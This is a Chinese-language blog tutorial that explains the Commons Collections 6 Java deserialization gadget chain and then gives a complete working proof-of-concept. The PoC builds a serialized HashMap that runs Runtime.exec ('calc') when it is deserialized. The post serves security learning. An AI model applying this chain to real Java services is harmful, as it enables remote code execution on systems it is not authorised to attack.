Java安全—CommonsCollections6

最新推荐文章于 2024-03-27 17:54:45 发布
最新推荐文章于 2024-03-27 17:54:45 发布
阅读量623 收藏
点赞数
分类专栏: java 文章标签: java 安全 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988816/article/details/126396121
版权

引子

上篇文章带大家学习了CC1链,今天来带领大家跟一下CC6链

先上POC

 Gadget chain:
 java.io.ObjectInputStream.readObject()
 	java.util.HashMap.readObject()
 		java.util.HashMap.hash()

org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()

org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
 org.apache.commons.collections.map.LazyMap.get()

org.apache.commons.collections.functors.ChainedTransformer.transform()

org.apache.commons.collections.functors.InvokerTransformer.transform()
 java.lang.reflect.Method.invoke()
 java.lang.Runtime.exec()

TiedMapEntry

TiedMapEntry接收一个map类的值 一个key,我们看看里面的hashcode()函数。

    public int hashCode() {
        Object value = getValue();
        return (getKey() == null ? 0 : getKey().hashCode()) ^
               (value == null ? 0 : value.hashCode()); 
    }

跟到getvalue()中 可以看到map.get 我们只需要将map值传LazyMap即可触LazyMap.get()。

构造链子

然后就和CC1和后半部分差不多了。

现在我们就要看看,哪里能触发hashcode();

根据URLDNS链,我们可以联想HashMap的readObject方法中调用了hash(key),而hash方法又调用了key.hashCode()。所以只需要让这个key等于TiedMapEntry对象即可。

hash:

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

大体是这个样子的

Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
HashMap<Object,Object> map=new HashMap<Object, Object>();
//置空 防止序列化时调用
Map<Object,Object> lazyMap=LazyMap.decorate(map,new ConstantTransformer(1));

调用hashcode的话就是通过put给key赋值TiedMapEntry
我们拿到了一个恶意的LazyMap对象lazyMap,将其作为TiedMapEntry的map属性传入

TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "key");

调用TiedMapEntry的hashCode()方法,我们需要将tiedMapEntry作为HashMap的key属性传入

Map expMap = new HashMap();
expMap.put(tiedMapEntry,"valuevalue");

实验时会发现有一些问题的出现

hashMap.put(tiedMapEntry,"XINO");

走到这里的时候,就会进行命令执行了,我们并没有反序列化。这是因为在构造时就出现了命令执行,我们可以通过反射进行修改。在序列化之前用一个没影响的Transformer[],也就是fakeTransformers,最后再改回来 。

ChainedTransformer chainedTransformer = new ChainedTransformer(fakeTransformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"XIN");
        Map hashMap = new HashMap();

        hashMap.put(tiedMapEntry,"XINO");



        Class clazz = Class.forName("org.apache.commons.collections.functors.ChainedTransformer");
        Field field = clazz.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer,transformers);
        byte[] bytes = serialize(hashMap);
        unserialize(bytes);

第二个问题,修改完发现还是运行不了,这里还是下面的问题。

hashMap.put(tiedMapEntry,"XINO");

hashMapput()方法里也调用了hash()函数,相当于把整个漏洞触发的过程提前触发了一遍 返回的value是1,然后调用了map.put("XIN",1),把这个键给添加进去了,导致反序列化的时候没法触发漏洞。

outerMap.remove("XIN");

完整的

POC

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonCollections6 {
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "XIN");
        HashMap<Object, Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"XINO");
        lazyMap.remove("XIN");
        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factoryField = lazyMapClass.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);
//        serialize(map2);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

结语

相比于CC1链,这个链子还是比较好跟的多少有点跟过的链子的影子(比如CC5),不过还是需要用心学习一下。里面还是有很多不太好懂的点的。欢迎大家点赞交流。

XINO丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手工编写简化版CommonsCollections6,带你实现Java8全版本反序列化利用
离别歌
07-24 702
这是代码审计知识星球中《Java安全漫谈》的第十二篇文章。本文带大家编写一个简化版的CommonsCollections6利用链,代码量相比于ysoserial减少50%,能够让大家更好...
burpsuite插件之Java Deserialization Scanner使用方法1
08-03
这款插件的目的是帮助安全研究人员检测应用程序中可能存在的Java反序列化漏洞,这些漏洞可能导致远程代码执行(RCE)或其他安全威胁。在理解和使用这个插件之前,我们先来了解一下Java反序列化。 Java反序列化是指...
Commons-Collections6分析
Le1a's Blog
03-23 2124
Java反序列化
[Java反序列化]—CommonsCollections6
Sentiment的博客
05-27 1046
前言 在开始前先回顾了一下之前的CommonsCollections1和URLDNS,因为本篇跟之前有一定联系,其次其实也是为了巩固下毕竟已经忘的差不多了。 接上篇,CC1的JDK版本需要低于8u71,AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以就需要找一个绕过高版本的利用链—CommonsCollections6 分析 cc1的LazyMap链:readObject()->invoker()->get(
CommonsCollections6分析
笑花大王
01-02 369
CommonsCollections6 LazyMap的漏洞触发在get和invoke中,完全没有setValue什么事,这也说明8u71后不能利用的原因和AnnotationInvocationHandler#readObject 中有没有setValue没任何关系在java8u71以后sun.reflect.annotation.AnnotationInvocationHandler#rea...
java6安全站点_Java安全之Commons Collections6分析
weixin_39611725的博客
02-27 188
Java安全之Commons Collections6分析0x00 前言其实在分析的几条链中都大致相同,都是基于前面一些链的变形,在本文的CC6链中,就和前面的有点小小的区别。在CC6链中也和CC5的利用链类似,但是CC6链中使用的是HashSet去触发LazyMap的get方法。而在CC5中使用的是BadAttributeValueExpException。0x01 POC分析这里还是去简化一下...
commonscollections_map1rq_java_
10-02
标题中的"commonscollections_map1rq_java_"暗示了我们讨论的主题是关于Java编程语言中一个特定的安全问题,即Apache Commons Collections库的一个已知反序列化漏洞。Apache Commons Collections是Java开发人员常用...
weblogic10.3.6补丁(java反序列化漏洞更新步骤).docx
09-10
WebLogic 10.3.6 补丁是一种安全补丁,旨在修复 Java 反序列化漏洞,该漏洞可能会导致 WebLogic 服务器遭受远程攻击。下面是 WebLogic 10.3.6 补丁的更新步骤: 1. 漏洞描述 近日,Apache Commons Collections 等...
用于生成利用不安全Java对象反序列化的有效负载的概念验证工具.zip
最新发布
05-23
Java对象的反序列化漏洞是一种常见的安全问题,它允许攻击者通过操纵反序列化过程来执行任意代码。这个概念验证工具,"用于生成利用不安全Java对象反序列化的有效负载的概念验证工具.zip",旨在帮助安全研究人员和...
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
commons-collections6
……
03-27 697
Java反序列化(CommonsCollections6)
Commons-Collections6 反序列化 从0开始手写exp
weixin_51458899的博客
04-11 2125
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
CommonCollections6链分析
Demodd的博客
03-20 4199
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
Java代码审计——Commons Collections6 HashSet
王嘟嘟的博客
12-15 1133
0x00 前言 cc6主要还是c部分的利用,就是触发LazyMap的问题。 0x01 HashSet cc6中最主要的就是将TiedMapEntry的调用。HashMap的put调用hash然后调用hashcode可以触发 TiedMapEntry的hashCode,然后调用HashMap.put从而触发整条链 1.HashMap 首先来看HashMap中的hashcode hashcode在hash方法中进行了调用 hash在多个方法中进行了调用,这里以put为例 那么我们的问题就是如何去触发这个pu
Common-Collections 6
Christ1na的博客
09-26 336
这个利⽤链可以在Java 7和8的⾼版本触发,没有版本限制,所以通用性较强
[Java反序列化]CommonsCollections6利用链学习
feng的博客
08-16 962
前言 继续跟着P神的《Java安全漫谈》来学习。前面学习了CC1,遇到的问题就是CC1用到了AnnotationInvocationHandler类,但是AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以需要找一个可以解决高版本Java的利用链。 因此也就开始了CC6的学习。CC6解决了高版本Java的限制,而且利用更加通用。总的来说,是在CC5(因为我偶然也学了CC5)的基础上,把前面的链部分又进行了通用性上的拓展。 构
java--commoncollections6 反序列化利用学习
zyer
05-12 246
总结 上周花了一周的时间学习commoncollections1,对java的反序列化利用好像有一丝丝的理解了。 暂时的思路就是:首先寻找存在对应方法的类,LazyMap-->get,TransformedMap-->setValue,put 从寻找一个存在readObject方法的类出发,通过寻找其它Object导致最后能触发上面的方法。 问题所在 从commoncollections1的学习发现,这条利用链对jdk版本有限制,高版本的jdk使用不了,具体原因就是在Java 8u71
Java反序列化漏洞——CommonsCollections6链分析
Thunderclap的博客
02-17 564
实际上在java.util.HashMap#readObject 中就可以找到HashMap#hash() 的调⽤,去掉了最前⾯的两次调⽤,在HashMap的readObject⽅法中,调⽤到了hash(key) ,⽽hash⽅法中,调⽤到了key.hashCode()。ysoserial中,是利⽤java.util.HashSet#readObject 到HashMap#put() 到HashMap#hash(key),最后到TiedMapEntry#hashCode()。getValue方法。
Java 安全编码.pdf
03-18
"本资源主要探讨了Java安全编码的相关问题,旨在帮助开发者避免常见的安全漏洞,提升Web应用的安全性。课程目标包括了解多种攻击方法,如SQL注入、跨站脚本攻击(XSS)、HTTP响应拆分等,并关注访问控制、随机性不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值